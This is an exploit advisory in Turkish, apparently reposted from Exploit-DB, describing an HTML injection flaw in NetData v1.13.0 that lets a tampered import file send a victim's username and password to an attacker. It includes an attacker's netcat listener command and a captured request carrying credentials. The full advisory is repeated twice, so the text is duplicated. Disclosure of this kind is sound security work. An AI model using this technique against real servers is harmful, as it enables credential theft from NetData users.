# Exploit Title/Exploit Başlığı: NetData v1.13.0 HTML Injection Vulnerability
# Date/Tarih: 2019-03-14
# Exploit Author/Ekleyen: Marcelo Vázquez (aka s4vitar)
# Category/Kategori: Webapps
# Tested on/Tes edilen yer:Windows,Linux
# Vendor Homepage/NetData Web Sayfası: https://my-netdata.io/
# Software Link/NetData İndirme Linki: https://docs.netdata.cloud/packaging/installer/
# Version/Versiyon: <= NetData v1.13.0
NetData , sunucunuzun trafik, veritabanı , hafıza vb. işlemlerini canlı olarak takip etmenizi sağlayan bir yazılımdır.
**Güvenlik Açığı Türü**
NetData , birden çok HTML açığı bulunduruyor.
**Güvenlik Açığı**
NetData , dışa aktarma özelliği ile sunucunuzun herhangi bir andaki performansını daha sonra tekrar izleme amacıyla cihazınıza kaydeder.
Daha sonrada içe aktarabilir.
Saldırgan , bu dosyayı HTML olarak kendi IP adres bilgileri ile izleme amaçlı değiştirirse kurbanın kullanıcı adı ve parolası alınır.
**Örnek Kullanım**
Konsoldan kurbanın ip adresi ve portunu izleme alın.(port 4646)
Kurban düzenlenmiş içe aktarma dosyasını yükleyince girdiği veriler konsolda sırasıyla görüntülenecektir.
root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)
GET /?username=test&password=passwordexample HTTP/1.1
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8
#Exploit Adresi : https://www.exploit-db.com/exploits/46545
# Date/Tarih: 2019-03-14
# Exploit Author/Ekleyen: Marcelo Vázquez (aka s4vitar)
# Category/Kategori: Webapps
# Tested on/Tes edilen yer:Windows,Linux
# Vendor Homepage/NetData Web Sayfası: https://my-netdata.io/
# Software Link/NetData İndirme Linki: https://docs.netdata.cloud/packaging/installer/
# Version/Versiyon: <= NetData v1.13.0
NetData , sunucunuzun trafik, veritabanı , hafıza vb. işlemlerini canlı olarak takip etmenizi sağlayan bir yazılımdır.
**Güvenlik Açığı Türü**
NetData , birden çok HTML açığı bulunduruyor.
**Güvenlik Açığı**
NetData , dışa aktarma özelliği ile sunucunuzun herhangi bir andaki performansını daha sonra tekrar izleme amacıyla cihazınıza kaydeder.
Daha sonrada içe aktarabilir.
Saldırgan , bu dosyayı HTML olarak kendi IP adres bilgileri ile izleme amaçlı değiştirirse kurbanın kullanıcı adı ve parolası alınır.
**Örnek Kullanım**
Konsoldan kurbanın ip adresi ve portunu izleme alın.(port 4646)
Kurban düzenlenmiş içe aktarma dosyasını yükleyince girdiği veriler konsolda sırasıyla görüntülenecektir.
root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)
GET /?username=test&password=passwordexample HTTP/1.1
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8
#Exploit Adresi : https://www.exploit-db.com/exploits/46545
